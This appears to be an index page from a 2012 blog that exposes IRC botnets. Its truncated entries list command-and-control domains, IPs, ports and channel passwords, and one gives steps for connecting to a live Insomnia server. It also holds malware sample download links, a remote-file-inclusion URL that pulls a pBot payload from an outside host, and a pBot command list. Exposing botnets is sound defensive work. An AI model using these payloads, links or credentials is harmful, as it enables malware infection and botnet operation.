Same hecker Burimi from here http://www.exposedbotnets.com/2012/03/217160224132irc-botnet-hosted-in.html Resolved : [gigasphere.su] To [61.31.99.67] Resolved : [gigasphere.su] To [82.165.135.196] Resolved : [gigasphere.su] To [173.246.102.122] Remote Host Port Number 61.31.99.67 4042 PASS ngrBot 61.31.99.67 1863 PASS ngrBot other ports used for ircd: 81,3333,1234,33333 NICK new[USA|XP|COMPUTERNAME]eejxdfy USER xd “” “lol” :xd Channels: Now talking in #boss Topic On: [ #bossRead more...
f.maqder.info(irc botnet hosted in United States Dallas Theplanet.com Internet Services Inc)
Resolved : [f.maqder.info] To [174.123.76.49] Remote Host Port Number 174.123.76.49 1863 PASS .. NICK SB-USA-XP-GgmPsYRi USER SB-USA-XP-GgmPsYRi 0 * f.maqder.info :SB-USA-XP-GgmPsYRi JOIN #sly ss Sample sample is .jpg so dont open the url in your browser and use vmware hosting infos: http://whois.domaintools.com/174.123.76.49
fasharlz.com(ngrBot hosted in United States Denver Wbs Connect)
Resolved : [fasharlz.com] To [8.33.7.91] Remote Host Port Number 174.140.174.50 80 199.15.234.7 80 62.149.142.23 80 8.33.7.91 8879 PASS secret NICK n{US|XPa}wjipllb USER wjipllb 0 0 :wjipllb JOIN #ircp secret PRIVMSG #ircp :[d=”http://www.lazynews.net/fashashogun.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataScxaxs.exe” – Download retries: 0 PRIVMSG #ircp :[DNS]: Blocked 0 domain(s) – Redirected 8 domain(s)Read more...
anonproducts.info(Loader hosted in Germany Frankfurt Leaseweb Germany Gmbh)
Another post from same guy here http://www.exposedbotnets.com/2012/04/webethugsinsomnia-bot-hosted-in.html Samples here: http://www.mediafire.com/?f25869md9bv3q9d password: virus Control Panel: Control Panel Url http://anonproducts.info/xx/ Loader.exe is a .net http bot, that connects to global-carding.ru/gate.php. Used for ddosing and loading malware (mainly RATS). Most files to be installed are loaded from webcamchat4free.in. Packet captures of it in action http://www.mediafire.com/?t8obhi8jttvh1l5 Credits to ourRead more...
we.be.thu.gs(Insomnia bot hosted in Netherland Amsterdam Ecatel Ltd)
A guy posted in this thread http://www.exposedbotnets.com/2012/04/insomnia-irc-bot-v113-manual.html about another Insomnia botnet server u can read in comments for more Resolved : [we.be.thu.gs] To [80.82.79.21] Bv1’s insomnia bot server Server we.be.thu.gs ssl required to connect. use xchat or install it on mirc accept his invalid certificate Port 443 Password fuckyou To conect do this /server we.be.thu.gs:+443Read more...
INSOMNIA IRC Bot v1.1.3 Manual
Insomnia is another irc bot sold in hecking forums coded in .NET I m posting the manual here so u can see what it does INSOMNIA v1.1.3 Table of Contents 1. Summary 2. Core Features 3. Malware Removal 4. SOCKS5 5. DDoS 6. Spreading Modules 7. Topic Generator Explained 8. Complete command list Summary InsomniaRead more...
noaccess.chaoswow.net(NZM bots hosted in Germany Nuremberg Hetzner Online Ag)
Resolved : [noaccess.chaoswow.net] To [176.9.195.60] Remote Host Port Number noaccess.chaoswow.net 18967 NICK USA|00|XP|SP2|1884237 USER fhfrlaam 0 0 :USA|00|XP|SP2|1884237 USERHOST USA|00|XP|SP2|1884237 MODE USA|00|XP|SP2|1884237 -x+i JOIN ##&crackr0x#&## 1@$$smoqueed@@ NICK USA|00|XP|SP2|0441020 USER zfoxtlp 0 0 :USA|00|XP|SP2|0441020 USERHOST USA|00|XP|SP2|0441020 MODE USA|00|XP|SP2|0441020 -x+i NICK USA|00|XP|SP2|5607084 USER ucxoiuauh 0 0 :USA|00|XP|SP2|5607084 USERHOST USA|00|XP|SP2|5607084 MODE USA|00|XP|SP2|5607084 -x+i NICK USA|00|XP|SP2|5062754 USER oqqeofyr 0Read more...
fghfg.translate-google-cache.com(irc botnet hosted in Taiwan Taipei Taiwan Fixed Network Co. Ltd)
Remote Host Port Number fghfg.translate-google-cache.com 5900 other domains: tux.shannen.cc urcdw.zavoddebila.com NICK [USA][XP-SP2]669217 USER VirUs “” “lol” :My_Name_iS_PIG_and_Iam_A_GaY2742 JOIN ##Turb0-37## NICK [USA][XP-SP2]062388 USER VirUs “” “lol” :My_Name_iS_PIG_and_Iam_A_GaY7011 NICK {NOVA}[USA][XP-SP2]750366 USER VirUs “” “lol” :My_Name_iS_PIG_and_Iam_A_GaY0938 hosting infos: http://whois.domaintools.com/61.31.99.67
Irc.javairc.org(turkish noobs scaning for RFI)
i was looking for online users in my vbulletin site and i saw this : /threads//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://95.154.24.14:32000//accounts/inc/admin/apache.jpg i downloaded apache.jpg and i found that is a lame pBot directing to irc.javairc.org here http://95.154.24.14:32000//accounts/ i found the lamer behind all this :-=[ HackeD by PasteL ]=- here is the chanel used for rfi scan Now talking inRead more...
69.66.87.90(pBot hosted in United States Des Moines Des Moines Public Schools)
= COMMANDS ============================================================================ .user <password> //login to the bot .logout //logout of the bot .die //kill the bot .restart //restart the bot .mail <to> <from> <subject> <msg> //send an email .dns <IP|HOST> //dns lookup .download <URL> <filename> //download a file .exec <cmd> // uses shell_exec() //execute a command .cmd <cmd> // uses popen() //execute aRead more...